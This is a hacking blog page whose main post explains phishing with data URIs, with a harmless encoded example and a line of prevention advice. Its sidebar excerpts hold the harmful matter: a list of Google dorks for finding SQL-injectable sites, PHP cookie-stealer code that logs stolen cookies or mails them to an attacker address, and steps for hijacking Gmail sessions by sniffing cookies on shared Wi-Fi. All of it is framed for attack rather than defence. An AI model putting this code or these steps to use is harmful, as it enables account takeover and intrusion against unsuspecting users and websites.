Skip to main content

Phishing By Data URI


Today I'm going to show you how hackers doing phishing attack by using Data URI technique. Before going to read the article, I recommends you to read about Phishing for better understanding of this technique.

Phishing by data URI is a simple technique used to steal login credentials and personal information from the users. Usually, phishing website needs a host, but by using “Phishing By Data URI” technique an attacker don't need a host to carry out an attack.

In this technique, attacker uses a simple URI scheme to present media content in the web browser without the actual data on the Internet.

The URI scheme is given below :
data :[<mediatype>][;base64];<data>

For Example :
data:text/html;base64,RWZmZWN0SGFja2luZw==


In the above example, I used base64 encoding to obfuscate the data from the victims. Otherwise, it looks like this :
data:text/html;,EffectHacking



Hackers with malicious intent can spoof an entire web-page using this technique and send the URI to victims through emails. However, preventing such attacks is simple, just look at the address bar before entering login credentials.

Since the data URI can be shortened by using several URL shortening services, try to avoid clicking on shortened URLs. Attackers can also include malicious javascript files in spoofed web pages by using the "Data URI" technique.

You can download the data URI of wikipedia page here.
Labels:

Comments

Post a Comment

Popular posts from this blog

Php And Google Dorks 2017

A Dork query, sometimes just referred to as a dork, is a search string that uses advanced search operators to find information that is not readily available on a website. Here is a list of dorks to find SQL injectable websites. Google Dorks trainers.php?id= article.php?ID= play_old.php?id= declaration_more.php?decl_id= Pageid= games.php?id= newsDetail.php?id= staff_id= historialeer.php?num= product-item.php?id= news_view.php?id= humor.php?id= communique_detail.php?id= sem.php3?id= opinions.php?id= spr.php?id= pages.php?id= chappies.php?id= prod_detail.php?id= viewphoto.php?id= view.php?id= website.php?id= hosting_info.php?id= gery.php?id= detail.php?ID= publications.php?id= Productinfo.php?id= releases.php?id= ray.php?id= produit.php?id= pop.php?id= shopping.php?id= productdetail.php?id= post.php?id= section.php?id= theme.php?id= page.php?id= shredder-categories.php?id= product_ranges_view.php?ID= shop_category.php?id= channel_id=...
2 comments
Read more

Create cookie stealer in PHP? get via email

<?php     $cookie = $HTTP_GET_VARS[“cookie”];     $steal = fopen(“cookiefile.txt”, “a”);     fwrite($steal, $cookie .”\n”);     fclose($steal);     ?> $cookie = $HTTP_GET_VARS[“cookie”]; steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable. $steal = fopen(“cookiefile.txt”, “a”); This open the cookiefile in append mode so that we can append the stolen cookie. fwrite($steal, $cookie .”\n”); This will store the stolen cookie inside the file. fclose($steal); close the opened file. Another version: Sends cookies to the hacker mail     <?php     $cookie = $HTTP_GET_VARS[“cookie”]; mail(“hackerid@mailprovider.com”, “Stolen Cookies”, $cookie);     ?> The above code will mail the cookies to hacker mail using the PHP() mail function with subject “Stolen cookies”. Third Version <?php     function GetIP()   ...
21 comments
Read more

Hack A Gmail Account using Packet Sniffer

Whenever someone logs into Gmail (or any other login service), a file called a "cookie" is sent to their computer. This cookie allows the user to stay logged in, even if they leave Gmail. A packet sniffer can find cookies being transferred over a wireless network. When you find a Gmail cookie, you can open it on your computer and potentially access your target's inbox. You'll need to be connected to the same wireless network as your target. Requirement 1. Wireshark 2. Cookie Cadger. Download and install Wireshark. Wireshark is a free network monitoring utility that you can download from wireshark.org. It is available for Windows, Mac, and Linux. Installing Wireshark is a straightforward process. Follow the prompts like you would with most programs. Download Cookie Cadger. This is a Java program that will will find and intercept cookies being sent across the wireless network. Cookie Cadger doesn't need to be installed. It works the same in ...
Post a Comment
Read more